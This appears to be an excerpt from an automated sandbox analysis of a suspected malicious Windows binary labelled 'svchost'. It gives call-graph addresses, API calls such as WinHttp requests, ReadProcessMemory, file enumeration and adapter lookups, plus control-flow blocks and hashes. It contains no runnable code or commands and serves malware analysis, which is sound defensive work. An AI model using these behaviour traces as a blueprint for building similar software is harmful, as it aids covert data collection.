1400162c6 9505->9506 9507 14000e0c0 2 API calls 9506->9507 9508 14001630d 9507->9508 9509 140002880 _vsnwprintf 9508->9509 9510 14001636d 9509->9510 9511 1400163cb 9510->9511 9512 14000e580 10 API calls 9510->9512 9511->9489 9513 14001637d 9512->9513 9513->9511 9514 140016385 GetFullPathNameW 9513->9514 9515 1400163a2 9514->9515 9516 1400163b6 HeapFree 9514->9516 9515->9489 9516->9511 9518 1400162a0 13 API calls 9517->9518 9519 140015c45 9518->9519 9520 140015c51 ??2@YAPEAX_K 9519->9520 9521 140015ce5 9519->9521 9522 140015c66 9520->9522 9524 140015c6e 9520->9524 9521->9494 9523 14000ee80 CoCreateInstance 9522->9523 9523->9524 9525 14000f120 32 API calls 9524->9525 9526 140015c87 HeapFree 9525->9526 9527 140015cd2 9526->9527 9528 140015caa 9526->9528 9527->9494 9528->9527 9529 14000ef60 25 API calls 9528->9529 9530 140015cb7 ??3@YAXPEAX 9529->9530 9530->9494 9532 1400075c0 70 API calls 9531->9532 9533 140015d27 9532->9533 9534 140015ec5 9533->9534 9537 14000caf0 11 API calls 9533->9537 9535 140015eda HeapFree 9534->9535 9536 140015eec 9534->9536 9535->9536 9538 140015ef1 HeapFree 9536->9538 9539 140015f06 9536->9539 9540 140015d40 9537->9540 9538->9539 9541 140015f32 9539->9541 9546 14000ef60 25 API calls 9539->9546 9542 140015d62 9540->9542 9543 140015d52 HeapFree 9540->9543 9544 140007740 43 API calls 9541->9544 9545 14000caf0 11 API calls 9542->9545 9543->9542 9547 140015f3c 9544->9547 9554 140015d6a 9545->9554 9548 140015f27 ??3@YAXPEAX 9546->9548 9547->9500 9547->9501 9548->9541 9549 140015dbd HeapFree 9549->9554 9550 140015eb0 HeapFree 9550->9534 9551 14000a3d0 32 API calls 9551->9554 9552 14000a230 17 API calls 9552->9554 9553 140015e84 9553->9534 9553->9550 9554->9549 9554->9551 9554->9552 9554->9553 9555 14000d5a0 13 API calls 9554->9555 9556 140015f48 9554->9556 9555->9554 9556->9553 9557 140015f64 ??2@YAPEAX_K 9556->9557 9558 140015f74 9557->9558 9559 140015f7c 9557->9559 9560 14000ee80 CoCreateInstance 9558->9560 9561 140002660 23 API calls 9559->9561 9560->9559 9562 140015fb7 9561->9562 9562->9553 9563 14000fca0 14 API calls 9562->9563 9564 140015fc3 9563->9564 9564->9553 9565 140015fd6 SysAllocString 9564->9565 9566 140015fd0 SysFreeString 9564->9566 9567 1400162a0 13 API calls 9565->9567 9566->9565 9568 140015ff6 9567->9568 9568->9553 9569 14000cd70 2 API calls 9568->9569 9569->9553 9721 140009430 9570->9721 9572 140009178 9575 140007c4b 9572->9575 9577 14000bd60 18 API calls 9572->9577 9580 140009205 9572->9580 9573 1400092c2 9573->9575 9576 1400092c7 HeapFree 9573->9576 9574 1400092ad HeapFree 9574->9573 9575->8157 9576->9575 9578 14000919e 9577->9578 9579 14000e0c0 2 API calls 9578->9579 9579->9580 9580->9573 9580->9574 9787 1400186a0 9581->9787 9584 1400098fa 9587 14000c8c0 10 API calls 9584->9587 9585 14000989e 9586 14000e0c0 2 API calls 9585->9586 9588 1400098b9 9586->9588 9589 14000990f 9587->9589 9590 14000e580 10 API calls 9588->9590 9591 14000a00c 9589->9591 9598 140009923 9589->9598 9715 1400098c4 memcpy 9590->9715 9592 14000e0c0 2 API calls 9591->9592 9594 14000a01f 9592->9594 9593 1400099d7 9595 14000bfe0 11 API calls 9593->9595 9596 14000e580 10 API calls 9594->9596 9597 1400099f2 9595->9597 9596->9715 9599 140009a06 9597->9599 9600 1400099f6 9597->9600 9598->9593 9602 1400099c5 9598->9602 9603 14000998e 9598->9603 9789 140014f70 9599->9789 9604 14000dfe0 10 API calls 9600->9604 9609 14000dfe0 10 API calls 9602->9609 9605 140007150 11 API calls 9603->9605 9604->9715 9610 1400099a5 9605->9610 9607 14000a104 HeapFree 9608 14000a116 9607->9608 9612 14000a122 HeapFree 9608->9612 9613 14000a134 9608->9613 9609->9715 9610->9593 9614 1400099a9 9610->9614 9612->9613 9616 14000a141 9613->9616 9618 14000caf0 11 API calls 9613->9618 9617 14000dfe0 10 API calls 9614->9617 9615 14000e0c0 2 API calls 9636 140009a28 9615->9636 9619 14000caf0 11 API calls 9616->9619 9622 14000a163 9616->9622 9617->9715 9618->9616 9619->9622 9620 14000a1a3 9623 14000a1ad HeapFree 9620->9623 9624 14000a1bf 9620->9624 9622->9620 9627 14000a189 HeapFree 9622->9627 9623->9624 9628 14000a1c9 HeapFree 9624->9628 9629 14000a1db 9624->9629 9625 140009aa3 9633 14000bfe0 11 API calls 9625->9633 9627->9622 9628->9629 9630 14000a1f5 9629->9630 9631 14000a1e0 HeapFree 9629->9631 9634 14000a214 9630->9634 9635 14000a1ff HeapFree 9630->9635 9631->9630 9632 140009b0c 9637 14000dfe0 10 API calls 9632->9637 9638 140009ab8 9633->9638 9634->8701 9635->9634 9636->9625 9647 140009aee 9636->9647 9794 140012430 9636->9794 9637->9715 9639 140009b21 9638->9639 9640 140009abc 9638->9640 9643 140015930 27 API calls 9639->9643 9644 14000dfe0 10 API calls 9640->9644 9646 140009b34 9643->9646 9644->9715 9648 140009b38 9646->9648 9649 140009b4d 9646->9649 9805 140015040 9647->9805 9651 14000dfe0 10 API calls 9648->9651 9650 14000e0c0 2 API calls 9649->9650 9652 140009b60 9650->9652 9651->9715 9653 140009b76 9652->9653 9654 140009dab 9652->9654 9659 140009bb7 9652->9659 9653->8701 9656 14000e0c0 2 API calls 9654->9656 9655 140009bc2 9827 14000f090 9655->9827 9657 140009dbe 9656->9657 9672 140009e13 9657->9672 9679 140009e86 9657->9679 9659->9655 9661 140009bf4 9659->9661 9662 140009c0f 9659->9662 9660 140009bce 9663 140009bd2 9660->9663 9664 140009c20 9660->9664 9665 140009c13 9661->9665 9666 140009bfa 9661->9666 9662->9665 9667 140009c7d 9662->9667 9669 14000caf0 11 API calls 9663->9669 9668 140009c55 9664->9668 9674 140011c80 61 API calls 9664->9674 9834 14000f1d0 9665->9834 9671 14000dfe0 10 API calls 9666->9671 9670 14000e580 10 API calls 9667->9670 9675 14000dfe0 10 API calls 9668->9675 9668->9715 9669->9715 9684 140009c89 9670->9684 9671->9715 9676 140009e1b 9672->9676 9677 140009e3c 9672->9677 9674->9668 9675->9715 9678 14000dfe0 10 API calls 9676->9678 9681 140009e48 9677->9681 9682 140009e5d 9677->9682 9680 140009e23 9678->9680 9683 140009eae 9679->9683 9685 140009f0a 9679->9685 9687 14000f1d0 13 API calls 9679->9687 9690 140015150 30 API calls 9680->9690 9686 14000dfe0 10 API calls 9681->9686 9689 140012430 13 API calls 9682->9689 9688 14000f090 47 API calls 9683->9688 9694 14000e0c0 2 API calls 9684->9694 9684->9715 9695 140011fe0 18 API calls 9685->9695 9691 140009e50 9686->9691 9687->9683 9692 140009ebd 9688->9692 9693 140009e69 9689->9693 9690->9715 9696 14000f1d0 13 API calls 9691->9696 9692->9663 9697 140009ec5 9692->9697 9698 140015150 30 API calls 9693->9698 9694->9715 9699 140009f58 9695->9699 9696->9680 9697->9668 9705 140011c80 61 API calls 9697->9705 9698->9715 9700 140009f71 9699->9700 9701 140009f5c 9699->9701 9703 140009f96 9700->9703 9704 140009f7d HeapFree 9700->9704 9702 14000dfe0 10 API calls 9701->9702 9702->9715 9706 14000e580 10 API calls 9703->9706 9704->9703 9707 140009f01 9705->9707 9708 140009fa7 9706->9708 9707->9668 9707->9685 9709 140009fd2 memcpy 9708->9709 9710 140009fb0 9708->9710 9712 1400123d0 14 API calls 9709->9712 9711 14000dfe0 10 API calls 9710->9711 9713 140009fb8 9711->9713 9712->9715 9714 1400123d0 14 API calls 9713->9714 9714->9715 9715->9607 9715->9608 9717 140009430 39 API calls 9716->9717 9718 140009334 9717->9718 9719 1400093f8 HeapFree 9718->9719 9720 140007c7f 9718->9720 9719->9720 9720->8157 9722 140009482 9721->9722 9723 140009499 9721->9723 9722->9572 9724 1400094de 9723->9724 9725 14000e580 10 API calls 9723->9725 9724->9572 9726 14000950b 9725->9726 9726->9724 9727 140009793 HeapFree 9726->9727 9747 140007150 9726->9747 9727->9724 9729 1400097ad HeapFree 9727->9729 9729->9724 9730 14000954e 9730->9727 9732 140006d20 13 API calls 9733 1400095ec 9732->9733 9733->9730 9734 14000e580 10 API calls 9733->9734 9735 14000960c 9734->9735 9735->9730 9736 14000e0c0 2 API calls 9735->9736 9737 14000964c 9736->9737 9753 1400179c0 memset WinHttpCrackUrl 9737->9753 9740 14000ce20 12 API calls 9741 1400096c9 9740->9741 9742 140006fb0 12 API calls 9741->9742 9746 1400096d2 9741->9746 9742->9746 9743 140009764 HeapFree 9744 140009779 9743->9744 9744->9727 9745 14000977e HeapFree 9744->9745 9745->9727 9746->9743 9746->9744 9748 14000719d 9747->9748 9749 1400071ff 9748->9749 9750 14000e580 10 API calls 9748->9750 9749->9730 9749->9732 9751 1400071b1 9750->9751 9751->9749 9752 1400071ec HeapFree 9751->9752 9752->9749 9754 140017a41 9753->9754 9755 1400096a7 9753->9755 9754->9755 9756 14000e580 10 API calls 9754->9756 9755->9730 9755->9740 9757 140017a5f 9756->9757 9757->9755 9758 14000e580 10 API calls 9757->9758 9763 140017a87 9758->9763 9759 140017d4b HeapFree 9760 140017d65 HeapFree 9759->9760 9761 140017d7a 9759->9761 9760->9761 9761->9755 9762 140017d87 HeapFree 9761->9762 9762->9755 9763->9759 9764 14000e0c0 2 API calls 9763->9764 9765 140017ad2 WinHttpOpen 9764->9765 9767 140017d43 9765->9767 9768 140017b2b WinHttpSetTimeouts WinHttpConnect 9765->9768 9767->9759 9769 140017d3a WinHttpCloseHandle 9768->9769 9770 140017b6c 9768->9770 9769->9767 9771 14000e0c0 2 API calls 9770->9771 9773 140017b7f 9771->9773 9772 140017d31 WinHttpCloseHandle 9772->9769 9773->9772 9774 140017bd9 WinHttpOpenRequest 9773->9774 9775 140017c02 WinHttpSendRequest 9774->9775 9776 140017d2c 9774->9776 9777 140017d23 WinHttpCloseHandle 9775->9777 9778 140017c28 WinHttpReceiveResponse 9775->9778 9776->9772 9777->9776 9778->9777 9779 140017c3b WinHttpQueryHeaders 9778->9779 9779->9777 9785 140017c74 9779->9785 9780 140017c90 WinHttpQueryDataAvailable 9780->9777 9780->9785 9781 140017d07 9782 14000cd70 2 API calls 9781->9782 9783 140017d19 9782->9783 9783->9777 9784 14000e580 10 API calls 9784->9785 9785->9777 9785->9780 9785->9781 9785->9784 9786 140017cea WinHttpReadData 9785->9786 9786->9777 9786->9785 9788 14000980f memset memset 9787->9788 9788->9584 9788->9585 9840 140016140 9789->9840 9791 140009a12 9791->9615 9792 140015010 HeapFree 9792->9791 9793 140014f8d 9793->9791 9793->9792 9795 140009add 9794->9795 9796 140012442 9794->9796 9800 140015150 9795->9800 9797 140013800 13 API calls 9796->9797 9798 14001245a 9797->9798 9799 140013650 13 API calls 9798->9799 9799->9795 9801 140014f70 13 API calls 9800->9801 9802 140015164 9801->9802 9803 140015174 9802->9803 9851 1400168e0 9802->9851 9803->9647 9806 140014f70 13 API calls 9805->9806 9807 140015065 9806->9807 9808 140009b04 9807->9808 9809 140016140 12 API calls 9807->9809 9808->9625 9808->9632 9810 14001507b 9809->9810 9810->9808 9811 1400150a3 9810->9811 9861 140016470 9810->9861 9812 140015cf0 137 API calls 9811->9812 9826 1400150da 9811->9826 9814 1400150b6 9812->9814 9816 14001510b HeapFree 9814->9816 9819 140016470 14 API calls 9814->9819 9814->9826 9816->9808 9817 1400163e0 10 API calls 9820 1400150f1 9817->9820 9818 140015c30 54 API calls 9818->9811 9821 1400150cb 9819->9821 9822 1400150f5 9820->9822 9823 14000ef60 25 API calls 9820->9823 9821->9816 9824 140015c30 54 API calls 9821->9824 9822->9816 9825 140015102 ??3@YAXPEAX 9823->9825 9824->9826 9825->9816 9826->9816 9826->9817 9828 14000f0a5 9827->9828 9829 14000f0f6 9827->9829 9831 14000e0c0 2 API calls 9828->9831 9830 140011210 47 API calls 9829->9830 9832 14000f102 9830->9832 9833 14000f0b6 9831->9833 9832->9660 9833->9660 9833->9833 9835 14000f1ef 9834->9835 9836 14000f24c 9834->9836 9835->9836 9837 140013800 13 API calls 9835->9837 9836->9655 9838 14000f244 9837->9838 9839 140013650 13 API calls 9838->9839 9839->9836 9842 140016157 9840->9842 9841 14001628a 9841->9793 9842->9841 9843 14000e580 10 API calls 9842->9843 9844 1400161ca 9843->9844 9845 14001624c 9844->9845 9846 14000e0c0 2 API calls 9844->9846 9845->9793 9847 1400161ea 9846->9847 9848 140002880 _vsnwprintf 9847->9848 9849 140016248 9848->9849 9849->9845 9850 140016270 HeapFree 9849->9850 9850->9845 9853 140016910 9851->9853 9852 14001698e 9852->9803 9853->9852 9854 14001694d 9853->9854 9855 14000ef60 25 API calls 9853->9855 9857 140016999 9854->9857 9858 14001697e 9854->9858 9856 140016944 ??3@YAXPEAX 9855->9856 9856->9854 9857->9852 9860 1400169a2 HeapFree 9857->9860 9859 14000e580 10 API calls 9858->9859 9859->9852 9860->9852 9862 1400162a0 13 API calls 9861->9862 9863 140016481 9862->9863 9864 140015094 9863->9864 9865 1400164a7 HeapFree 9863->9865 9864->9811 9864->9818 9865->9864 9866 140003800 9867 140003810 9866->9867 9869 140003849 SleepEx 9867->9869 9870 140015340 9867->9870 9869->9867 9871 140015791 9870->9871 9892 14001536d 9870->9892 9871->9867 9872 1400153a4 HeapFree 9872->9892 9873 1400153c0 HeapFree 9873->9892 9874 1400153dc HeapFree 9874->9892 9876 1400153f8 HeapFree 9876->9892 9877 140015414 HeapFree 9877->9892 9879 1400156c0 9879->9871 9881 1400156fa HeapFree 9879->9881 9882 14001570c 9879->9882 9880 14000e0c0 memset memcpy 9880->9892 9881->9882 9883 140015716 HeapFree 9882->9883 9884 140015728 9882->9884 9883->9884 9885 140015732 HeapFree 9884->9885 9886 140015744 9884->9886 9885->9886 9887 14001574e HeapFree 9886->9887 9888 140015760 9886->9888 9887->9888 9889 14001576a HeapFree 9888->9889 9890 14001577c HeapFree 9888->9890 9889->9890 9890->9871 9892->9872 9892->9873 9892->9874 9892->9876 9892->9877 9892->9879 9892->9880 9893 1400155e2 _time64 9892->9893 9894 14000caf0 11 API calls 9892->9894 9895 14000e580 10 API calls 9892->9895 9896 14001566d _time64 9892->9896 9897 14001568e HeapFree 9892->9897 9898 1400158dd _time64 9892->9898 9899 14000f8d0 9892->9899 9937 140016030 9892->9937 9945 140016ba0 9892->9945 9893->9892 9894->9892 9895->9892 9896->9892 9897->9892 9898->9892 9900 14000fbd0 9899->9900 9903 14000f921 9899->9903 9901 14000fbda HeapFree 9900->9901 9902 14000fbef 9900->9902 9901->9902 9902->9892 9903->9900 9904 14000e580 10 API calls 9903->9904 9905 14000f956 9904->9905 9906 14000e580 10 API calls 9905->9906 9907 14000f966 9906->9907 9908 14000e580 10 API calls 9907->9908 9920 14000f975 9908->9920 9909 14000fb01 9910 14000fb42 9909->9910 9911 14000fb2d HeapFree 9909->9911 9912 14000fb47 HeapFree 9910->9912 9913 14000fb5c 9910->9913 9911->9910 9912->9913 9914 14000fb65 HeapFree 9913->9914 9915 14000fb7a 9913->9915 9914->9915 9915->9902 9916 14000fb88 HeapFree 9915->9916 9917 14000fb9c 9915->9917 9916->9917 9918 14000fba1 HeapFree 9917->9918 9919 14000fbb6 9917->9919 9918->9919 9919->9900 9922 14000fbbb HeapFree 9919->9922 9920->9909 9921 14000fa2c 9920->9921 9923 140013b00 ReadProcessMemory 9920->9923 9921->9909 9924 14000fa77 9921->9924 9926 140013b00 ReadProcessMemory 9921->9926 9922->9900 9925 14000fa0a 9923->9925 9924->9909 9927 140013b00 ReadProcessMemory 9924->9927 9931 14000fabd 9924->9931 9925->9909 9930 14000bf10 11 API calls 9925->9930 9928 14000fa56 9926->9928 9929 14000faa2 9927->9929 9928->9909 9932 14000bf10 11 API calls 9928->9932 9929->9909 9933 14000bf10 11 API calls 9929->9933 9930->9921 9931->9909 9934 14000e580 10 API calls 9931->9934 9932->9924 9933->9931 9935 14000fae2 9934->9935 9935->9909 9936 140013b00 ReadProcessMemory 9935->9936 9936->9909 9939 14001604f 9937->9939 9938 14001612c 9938->9892 9939->9938 9940 14000e580 10 API calls 9939->9940 9943 1400160b8 9940->9943 9941 140016109 9941->9892 9942 1400160ef memcpy 9942->9941 9943->9941 9943->9942 9944 1400160fd memcpy 9943->9944 9944->9941 9946 140016e2f 9945->9946 9947 140016bfd 9945->9947 9946->9892 9947->9946 9967 1400169f0 9947->9967 9950 1400169f0 16 API calls 9951 140016d76 9950->9951 9952 140011fe0 18 API calls 9951->9952 9953 140016dc1 9951->9953 9952->9953 9954 140016ddb 9953->9954 9958 1400123d0 14 API calls 9953->9958 9955 140016dfb 9954->9955 9961 1400123d0 14 API calls 9954->9961 9956 140016e15 9955->9956 9957 140016e00 HeapFree 9955->9957 9956->9946 9959 140016e1a HeapFree 9956->9959 9957->9956 9958->9954 9959->9946 9960 14000bfe0 11 API calls 9962 140016cdc 9960->9962 9961->9955 9962->9955 9963 14000bfe0 11 API calls 9962->9963 9964 140016cfa 9963->9964 9964->9955 9965 140011fe0 18 API calls 9964->9965 9966 140016d50 9965->9966 9966->9950 9966->9953 9968 140016a0b 9967->9968 9969 140016b70 9968->9969 9970 14000e580 10 API calls 9968->9970 9969->9946 9969->9960 9969->9966 9972 140016a72 9970->9972 9971 140016aa9 memcpy 9977 140016ac9 9971->9977 9972->9969 9972->9971 9973 140016aba memcpy 9972->9973 9973->9977 9974 140016b41 HeapFree 9974->9969 9976 140016030 12 API calls 9976->9977 9977->9974 9977->9976 9978 140016b1b HeapFree 9977->9978 9978->9974 9978->9977 9979 140005e10 9980 140005e40 9979->9980 9986 140005e4c 9979->9986 9981 140006091 9982 1400060b5 9981->9982 9983 1400060af SysFreeString 9981->9983 9984 1400060c7 9982->9984 9985 1400060be SysFreeString 9982->9985 9983->9982 9985->9984 9986->9981 9987 140005eb5 tolower 9986->9987 9990 140005ed0 9986->9990 9987->9986 9987->9990 9988 140005f20 SysFreeString 9988->9990 9989 140005f33 SysFreeString 9989->9990 9990->9981 9990->9988 9990->9989 9991 140005fc7 _wtoi 9990->9991 9992 140005f94 tolower 9990->9992 9993 140006001 SysAllocString 9990->9993 9994 140005ff1 HeapFree 9990->9994 9997 1400065d0 9990->9997 10044 140006100 9990->10044 9991->9990 9992->9990 9993->9990 9994->9993 10003 140006634 9997->10003 9998 140006a5e 9999 140006a86 9998->9999 10000 140006a80 SysFreeString 9998->10000 10001 140006a96 9999->10001 10002 140006a90 SysFreeString 9999->10002 10000->9999 10001->9990 10002->10001 10003->9998 10004 14000e580 10 API calls 10003->10004 10005 14000669c 10004->10005 10006 14000e580 10 API calls 10005->10006 10007 1400066b6 10006->10007 10008 14000e580 10 API calls 10007->10008 10009 1400066d2 10008->10009 10010 14000e580 10 API calls 10009->10010 10043 1400066e7 10010->10043 10011 140006a3c 10011->9998 10012 140006a49 HeapFree 10011->10012 10012->9998 10013 140006a25 HeapFree 10013->10011 10014 140006af2 10016 140006afb HeapFree 10014->10016 10017 140006b0d 10014->10017 10015 140006ae0 HeapFree 10015->10014 10016->10017 10019 14000e580 10 API calls 10017->10019 10018 140006760 SysFreeString 10018->10043 10021 140006b1f 10019->10021 10020 140006775 SysFreeString 10020->10043 10022 14000e580 10 API calls 10021->10022 10023 140006b35 10022->10023 10025 140006b95 HeapFree 10023->10025 10026 140006ba7 10023->10026 10024 140006a0e 10024->10013 10025->10026 10027 140006bc2 10026->10027 10028 140006bb0 HeapFree 10026->10028 10028->10027 10029 14000e0c0 2 API calls 10029->10043 10030 1400067f6 lstrcmpiW 10030->10043 10031 140006ac4 10031->10014 10031->10015 10032 14000c8c0 10 API calls 10032->10043 10033 14000685c _wtoi 10036 14000caf0 11 API calls 10033->10036 10034 1400069bd 10035 1400069f4 10034->10035 10039 1400069dd HeapFree 10034->10039 10035->10024 10038 1400069f9 HeapFree 10035->10038 10037 140006883 10036->10037 10040 1400068c4 HeapFree 10037->10040 10042 1400068ad HeapFree 10037->10042 10038->10024 10039->10034 10041 1400068e0 rand 10040->10041 10041->10043 10042->10037 10043->10011 10043->10013 10043->10018 10043->10020 10043->10024 10043->10029 10043->10030 10043->10031 10043->10032 10043->10033 10043->10034 10043->10041 10045 140001fa0 4 API calls 10044->10045 10069 140006172 10045->10069 10046 1400063c7 10047 140006506 SysFreeString 10046->10047 10048 14000650c 10046->10048 10047->10048 10049 140006516 SysFreeString 10048->10049 10050 14000651f 10048->10050 10049->10050 10051 140006524 SysFreeString 10050->10051 10052 14000652d 10050->10052 10051->10052 10053 14000657e 10052->10053 10056 140006562 SysFreeString SysFreeString 10052->10056 10054 14000659b HeapFree 10053->10054 10055 1400065b0 10053->10055 10054->10055 10055->9990 10056->10053 10056->10056 10057 1400061eb SysFreeString 10057->10069 10058 1400061fb SysFreeString 10058->10069 10059 140006211 SysFreeString 10059->10069 10060 140006230 SysFreeString SysFreeString 10060->10060 10060->10069 10061 140006257 HeapFree 10061->10069 10062 14000e0c0 memset memcpy 10062->10069 10064 1400063de SysAllocString 10065 14000e0c0 2 API calls 10064->10065 10065->10069 10066 140006484 ??2@YAPEAX_K 10066->10069 10067 140006473 SysAllocString 10067->10066 10069->9990 10069->10046 10069->10057 10069->10058 10069->10059 10069->10060 10069->10061 10069->10062 10069->10064 10069->10066 10069->10067 10071 140002190 10069->10071 10076 140001f50 SysAllocString SysAllocString 10069->10076 10077 140002050 10069->10077 10085 140002110 10071->10085 10073 140002202 10073->10069 10075 14000e580 10 API calls 10075->10073 10076->10069 10078 14000206a 10077->10078 10079 1400020fe 10077->10079 10080 14000e580 10 API calls 10078->10080 10079->10069 10081 14000207b 10080->10081 10081->10079 10082 140002080 ??2@YAPEAX_K 10081->10082 10083 1400020d9 10082->10083 10084 14000209b SysAllocString SysAllocString 10082->10084 10083->10069 10084->10083 10086 14000212b 10085->10086 10087 140002158 10085->10087 10088 140002132 SysFreeString SysFreeString 10086->10088 10089 14000216a HeapFree 10087->10089 10090 14000217c 10087->10090 10088->10087 10088->10088 10089->10090 10090->10073 10090->10075 10091 140006d20 10093 140006d75 10091->10093 10092 140006d79 10093->10092 10094 140006fb0 12 API calls 10093->10094 10095 140006dba 10094->10095 10096 140006eb9 10095->10096 10097 14000e0c0 2 API calls 10095->10097 10096->10092 10098 140006f7c HeapFree 10096->10098 10099 140006dd7 10097->10099 10098->10092 10099->10096 10100 14000e0c0 2 API calls 10099->10100 10101 140006e37 10100->10101 10101->10096 10102 14000e0c0 2 API calls 10101->10102 10102->10096
          APIs
          Memory Dump Source
          • Source File: 00000008.00000002.2670032562.0000000140001000.00000020.00000400.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
          • Associated: 00000008.00000002.2670006751.0000000140000000.00000002.00000400.00020000.00000000.sdmpDownload File
          • Associated: 00000008.00000002.2670055662.0000000140019000.00000002.00000400.00020000.00000000.sdmpDownload File
          • Associated: 00000008.00000002.2670071798.0000000140020000.00000004.00000400.00020000.00000000.sdmpDownload File
          • Associated: 00000008.00000002.2670101099.0000000140021000.00000002.00000400.00020000.00000000.sdmpDownload File
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_8_2_140000000_svchost.jbxd
          Yara matches
          Similarity
          • API ID: AddressProc$??2@FreeHeapLibraryLoad$CreateInitialize_time64$CountCurrentDirectoryInstanceSecuritySleepThreadTickmemsetsrand
          • String ID:
          • API String ID: 3681577518-0
          • Opcode ID: a823052580928bd824f163ca6e897ae67aad89d72ca9790ee6e18b48b9a0a523
          • Instruction ID: 68504463b67ef1b29f9b7d47820dd4a867066b0ffea43447dab23e93c07c9791
          • Opcode Fuzzy Hash: a823052580928bd824f163ca6e897ae67aad89d72ca9790ee6e18b48b9a0a523
          • Instruction Fuzzy Hash: 7C923BB2604B8585EB62DF22E8503ED37A4F788BC8F444426EB4A57BB9DF39C945C740

          Control-flow Graph

          • Executed
          • Not Executed
          control_flow_graph 1352 14000d0f0-14000d139 1354 14000d166-14000d16b 1352->1354 1355 14000d13b-14000d153 1352->1355 1356 14000d194-14000d197 1354->1356 1357 14000d16d 1354->1357 1363 14000d158-14000d15b 1355->1363 1360 14000d199-14000d1a8 HeapFree 1356->1360 1361 14000d1ae-14000d1b2 1356->1361 1359 14000d170-14000d17b 1357->1359 1364 14000d17d-14000d189 HeapFree 1359->1364 1365 14000d18f-14000d192 1359->1365 1360->1361 1362 14000d1b5-14000d1d6 1361->1362 1366 14000d1d7-14000d1da 1363->1366 1367 14000d15d-14000d164 1363->1367 1364->1365 1365->1356 1365->1359 1366->1354 1368 14000d1dc-14000d1ee 1366->1368 1367->1354 1367->1363 1369 14000d1f0-14000d1f3 1368->1369 1370 14000d203-14000d206 1369->1370 1371 14000d1f5-14000d1fc 1369->1371 1370->1354 1373 14000d20c-14000d224 1370->1373 1371->1369 1372 14000d1fe 1371->1372 1372->1354 1374 14000d226-14000d235 1373->1374 1375 14000d25f-14000d263 1373->1375 1376 14000d238-14000d23b 1374->1376 1377 14000d269-14000d270 1375->1377 1379 14000d25a-14000d25d 1376->1379 1380 14000d23d-14000d246 1376->1380 1377->1354 1378 14000d276-14000d294 FindFirstFileW 1377->1378 1378->1354 1381 14000d29a-14000d2a6 1378->1381 1379->1375 1379->1377 1380->1379 1382 14000d248-14000d256 1380->1382 1383 14000d2b0-14000d2b8 1381->1383 1382->1376 1384 14000d258 1382->1384 1385 14000d3c9-14000d3e3 FindNextFileW 1383->1385 1386 14000d2be-14000d2d9 call 14000e580 1383->1386 1384->1375 1385->1383 1388 14000d3e9-14000d3f7 GetLastError 1385->1388 1390 14000d3fb-14000d40b 1386->1390 1391 14000d2df-14000d2f3 call 14000e580 1386->1391 1388->1390 1390->1354 1395 14000d411-14000d418 1390->1395 1391->1390 1396 14000d2f9-14000d327 call 14000e0c0 1391->1396 1395->1362 1399 14000d346-14000d375 call 140002880 1396->1399 1400 14000d329 1396->1400 1399->1385 1404 14000d377-14000d385 1399->1404 1401 14000d330-14000d344 1400->1401 1401->1399 1401->1401 1405 14000d387-14000d393 HeapFree 1404->1405 1406 14000d399-14000d39b 1404->1406 1405->1406 1407 14000d3b1-14000d3c6 HeapFree 1406->1407 1408 14000d39d-14000d3af call 14000e580 1406->1408 1407->1385 1408->1385
          APIs
          Strings
          Memory Dump Source
          • Source File: 00000008.00000002.2670032562.0000000140001000.00000020.00000400.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
          • Associated: 00000008.00000002.2670006751.0000000140000000.00000002.00000400.00020000.00000000.sdmpDownload File
          • Associated: 00000008.00000002.2670055662.0000000140019000.00000002.00000400.00020000.00000000.sdmpDownload File
          • Associated: 00000008.00000002.2670071798.0000000140020000.00000004.00000400.00020000.00000000.sdmpDownload File
          • Associated: 00000008.00000002.2670101099.0000000140021000.00000002.00000400.00020000.00000000.sdmpDownload File
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_8_2_140000000_svchost.jbxd
          Yara matches
          Similarity
          • API ID: FreeHeap$FileFind$ErrorFirstLastNext
          • String ID: *.*
          • API String ID: 4099517661-438819550
          • Opcode ID: b30ee97ddfff90d921fc3d52932d7a5ba7ced4178ab3b975e1da280bb0eb53f2
          • Instruction ID: 34dfc1c74ec25d379e75e5fc480104f8909db529063c5106447f390b2015c3b2
          • Opcode Fuzzy Hash: b30ee97ddfff90d921fc3d52932d7a5ba7ced4178ab3b975e1da280bb0eb53f2
          • Instruction Fuzzy Hash: 46819DB1211B8582EB66CB13E5503EA73A5FB88BC0F445126EB8A577A9EF38C941C750

          Control-flow Graph

          • Executed
          • Not Executed
          control_flow_graph 1658 14000a230-14000a256 1659 14000a258-14000a26c HeapFree 1658->1659 1660 14000a270-14000a27f call 14000e580 1658->1660 1659->1660 1663 14000a285-14000a29d GetAdaptersInfo 1660->1663 1664 14000a3bb-14000a3c4 1660->1664 1665 14000a2cc-14000a2ee call 140006fb0 1663->1665 1666 14000a29f-14000a2b1 call 14000e580 1663->1666 1672 14000a2fa-14000a313 call 14000e580 1665->1672 1673 14000a2f0-14000a2f9 1665->1673 1666->1664 1671 14000a2b7-14000a2c1 1666->1671 1671->1665 1672->1673 1676 14000a315-14000a332 1672->1676 1677 14000a340-14000a369 call 140002880 1676->1677 1680 14000a36b-14000a38f 1677->1680 1681 14000a391-14000a3a0 HeapFree 1680->1681 1682 14000a3a6-14000a3b5 HeapFree 1680->1682 1681->1682 1682->1664
          APIs
          Strings
          Memory Dump Source
          • Source File: 00000008.00000002.2670032562.0000000140001000.00000020.00000400.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
          • Associated: 00000008.00000002.2670006751.0000000140000000.00000002.00000400.00020000.00000000.sdmpDownload File
          • Associated: 00000008.00000002.2670055662.0000000140019000.00000002.00000400.00020000.00000000.sdmpDownload File
          • Associated: 00000008.00000002.2670071798.0000000140020000.00000004.00000400.00020000.00000000.sdmpDownload File
          • Associated: 00000008.00000002.2670101099.0000000140021000.00000002.00000400.00020000.00000000.sdmpDownload File
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_8_2_140000000_svchost.jbxd
          Yara matches
          Similarity
          • API ID: FreeHeap$AdaptersAddressInfoLibraryLoadProc
          • String ID: %02X
          • API String ID: 3713241502-436463671
          • Opcode ID: 54760e3ea149fe77b89ba2b72778ff7ec6480fe297307d0b5ce2e4d3fbdbd36a
          • Instruction ID: e87dbf364566d0340ffc93f2b35573667175a0268ae96110bc771c99fe9a3d48
          • Opcode Fuzzy Hash: 54760e3ea149fe77b89ba2b72778ff7ec6480fe297307d0b5ce2e4d3fbdbd36a
